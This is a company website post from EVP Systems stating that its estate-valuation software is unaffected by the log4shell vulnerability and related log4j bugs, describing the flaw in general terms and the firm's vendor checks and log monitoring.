• Skip to main content
  • Skip to primary sidebar
  • Skip to footer

EVP Systems

  • Home
  • Support
    • Contact
    • FAQs
    • Tutorials
  • Software
  • Services
  • Accounts
    • Sign-Up
    • Mailing Lists
    • Pricing
    • Payments
  • About Us
    • The Company
    • EVP Office
    • Professional Services
    • EVP Everywhere
    • EVP Upload
    • Legal and Compliance
    • Sales Material
    • Contact Us

EVP Systems Unaffected by log4shell and Associated Vulnerabilities

All EVP Systems software is unaffected by the recently announced “log4j” vulnerability, officially named CVE-2021-44228 and nicknamed “log4shell.” It is also not subject to CVE-2021-45046 or CVE-2021-45105, two associated vulnerabilities of log4j. EVP Office applications—EstateVal, GiftVal, CostBasis, and CapWatch—do not use the log4j library, and therefore require no mitigation. Most of our internal systems do not use log4j either, but we do have one that has been (repeatedly) upgraded to the latest release, and therefore poses no threat.

Details

On Friday, December 10, 2021, the Apache Foundation announced that log4j, a popular logging library for the Java programming language, had a critical remote code execute (RCE) bug. When programs that use versions of log4j 2.0.0 through 2.15.0 are sent a specific series of characters, the target system can be forced to run arbitrary commands. This effectively compromises the entire system. Version 2.16.0 allows for an infinite-recursion denial-of-service attack.

log4j is very popular, and used almost universally by Java programmers. Millions of systems—from banks to stock exchanges to spacecraft—rely on the library to handle the creation and maintenance of their internal logs. That such a foundational piece of shared software was compromised is extremely serious.

Mitigations

As noted, EVP Systems itself is unaffected by the “log4shell” and associated bugs. None of our EVP Office programs use log4j, nor do the vast majority of our internal systems. The one program that does use log4j is running 2.17.0, the latest release as of December 18, 202

However, EVP Systems does not exist in a vacuum, and we are in contact with all of our vendors—our cloud-hosting provider, our e-mail service, our data suppliers, among others—to ensure that their services are not compromised or affected by the bug. If we encounter any issues, we will update our clients accordingly.

We are also monitoring our logs for the specific series of characters that indicate an attempted CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105 attack. Though all such attacks will fail, we intend to block their source IP addresses to prevent any further intrusion attempts, using any other known or potential bugs.

Questions

If you have any questions about EVP Systems handling of log4shell / CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45015, please contact our Compliance Department at compliance@evspys.com.

Also, please note that a history of our treatment of high-profile Internet vulnerabilities is always available on our website.

(This article was updated on December 16, 2021 to include information about CVE-2021-45046. It was also updated on December 20, 2021 to include information about CVE-2021-45105.)

Posted on December 13, 2021 • Tagged with EVP Office, Vulnerabilities

Primary Sidebar

Things You Should Know

  • Good to Know: Reports on April 9, 2025
  • Happy Holidays from EVP Systems! on December 9, 2024
  • Fee Changes for 2025 on November 1, 2024
  • We're Going to Disneyland---for NAEPC 2024! on October 18, 2024
  • CrowdStrike BSOD and EVP Systems
  • EVP Office 9.1.3 Now Available on July 18, 2024
  • EVP Office 9.1.0: Now Available, Featuring Name Preview on January 8, 2024
  • EVP Systems at Heckerling 2024 on January 3, 2024
  • Happy Holidays from EVP Systems! on December 11, 2023
  • EVP Systems at the California Probate Referees Conference on November 30, 2023
  • Join us at NAEPC 2023 on November 11, 2023
  • Good to Know: The Grid on August 23, 2023
  • Announcing Fee Changes for 2023 on October 7, 2022
  • "Single Broker Quotes" Available Again on April 14, 2022
  • EVP Systems Prepared for Russia / Ukraine Conflict on March 14, 2022
  • Expat and Open Source at EVP Systems on March 1, 2022
  • EVP Office 9.0.1 Offers Built-In Calculator, More Crypto, New Export on February 8, 2022
  • Jack Barthel, 1937 - 2021 on January 19, 2022
  • EVP Systems Unaffected by log4shell and Associated Vulnerabilities on December 13, 2021
  • EVP Office 9: Something Big! on October 13, 2021
  • EVP Office 8.5.3: Secure by Default on July 13, 2021
  • Ready for Windows 11 on July 2, 2021
  • EVP Office 8.5.2: Native Excel Export, Better Copy-and-Paste, Mailing Lists on April 8, 2021
  • A Lockdown Check-In on October 5, 2020
  • Upgrade Your Invoice on September 21, 2020
  • EVP Systems Introduces Modern, Streamlined Website on August 13, 2020
  • EVP Office 8.5.0 Released on June 17, 2020
  • EVP Systems Continues to Support Retired Versions of Windows on December 4, 2019
  • EstateVal 8.4.0 Prices Foreign Currencies, Precious Metals on October 25, 2019
  • GEMS Adds EVP Everywhere for Faster, Easier Pricing on April 15, 2019
  • EVP Office 8.3.1 Now Available; Features Easy Pricing of Puts and Calls on March 15, 2019
  • Reminder: Fee Changes Coming in 2019 on December 28, 2018
  • TEdec Adds Built-In Evaluations, with EVP Everywhere on December 3, 2018
  • Primary and Composite Exchange Pricing in EstateVal
  • A Brief Introduction to EstateVal

Don’t let death and taxes ruin your day!

Footer

About EVP Systems

Trusted by thousands of banks, brokerages, and law firms, Estate Valuations & Pricing Systems has been the leading provider of high-quality security evaluations for estate- and gift-tax purposes for over 40 years.

Get in Touch

1531 Chapala St., #1
Santa Barbara, CA 93101
(818) 313-6300 • FAX: (818) 313-6313
support@evpsys.com
sales@evpsys.com
Twitter
Mailing Lists

Explore the Site

Open Source Communication GDPR Note Billing

All contents copyright © 1984–2025 Estate Valuations & Pricing Systems, Inc. • Do Not Sell My Personal Information • Service Status